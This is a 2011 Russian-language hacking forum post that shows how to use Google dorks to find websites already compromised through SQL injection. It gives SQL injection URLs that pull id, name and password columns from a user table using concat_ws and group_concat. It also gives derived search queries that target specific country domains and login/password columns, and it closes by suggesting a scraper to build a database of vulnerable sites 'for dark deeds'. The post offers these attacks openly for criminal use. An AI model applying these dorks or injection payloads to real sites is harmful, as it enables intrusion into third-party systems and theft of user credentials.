1. На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.
Скрыть объявление
Привет, Незнакомец! У тебя есть возможность Оставить комментарий в теме

Собираем базу SQLi или спасибо поисковикам

Тема в разделе "H4X S0FTW4RE", создана пользователем 2FED, 12 окт 2011.

  1. 2FED 8айтовый

    2FED
    TS
    WebVoice
    Регистрация:
    23 мар 2011
    Сообщения:
    67
    Симпатии:
    2
    [​IMG]

    Всем известно, что поисковые машины индексируют любую информацию, которая не закрыта в robots.txt. Этим давно начали пользоваться взломщики для поиска уязвимых систем. Многие используют так называемые дорки для нахождения определенных дыр.

    После недавних событий с индексацией гуглом и яндексом пользовательских данных абонентов мтс и мегафон мне в голову пришла идея, а не попробывать ли искать с помощью дорка уже "сломанные" сайты. Мне это нужно было для своих целей, о которых я сейчас говорить не буду =).
    Для поиска потенциально уязвимых сайтов(для sql иньекций) в основном используется дорк вида:
    Код:
    inurl:*.php?id=
    При взломе в основном используются конструкции типа:
    Код:
    http://site.ru/*.php?id=-1+1,2,concat_ws(0x3a,id,name,pass),4+from+user
    или
    Код:
    http://site.ru/*.php?id=-1+1,2,group_concat(0x3a,id,name,pass),4+from+user
    Исходя из этого, можно выделить одну общую особенность, для всех проиндексированных страниц, общим будет:
    Код:
    concat_ws(0x3a,
    или
    Код:
    group_concat(0x3a
    из чего выплывает новый дорк:
    Код:
    inurl:concat_ws(0x3a,
    или
    Код:
    inurl:group_concat(0x3a,
    Благодаря возможности искать по определенной доменной зоне, можно изменить свой запрос в соответствиями с требованиями:
    Код:
    site:.us inurl:concat_ws(0x3a,
    или
    Код:
    site:.de inurl:group_concat(0x3a,
    Пример запроса
    Код:
    site:.de inurl:group_concat(0x3a,
    [​IMG]

    Также в запрос можно добавить наименования столбцов, интересующих нас(кто в теме, меня понял =) ) :
    Код:
    inurl:concat_ws(0x3a,_login,_pass
    Плюс, если воспользоваться парсером гугла, можно собрать готовую базу уязвимых сайтов для своих темных дел =)

    Специально для webcriminal.ru (с) 2FED
     
    Последнее редактирование: 13 окт 2011
    1 человеку нравится это.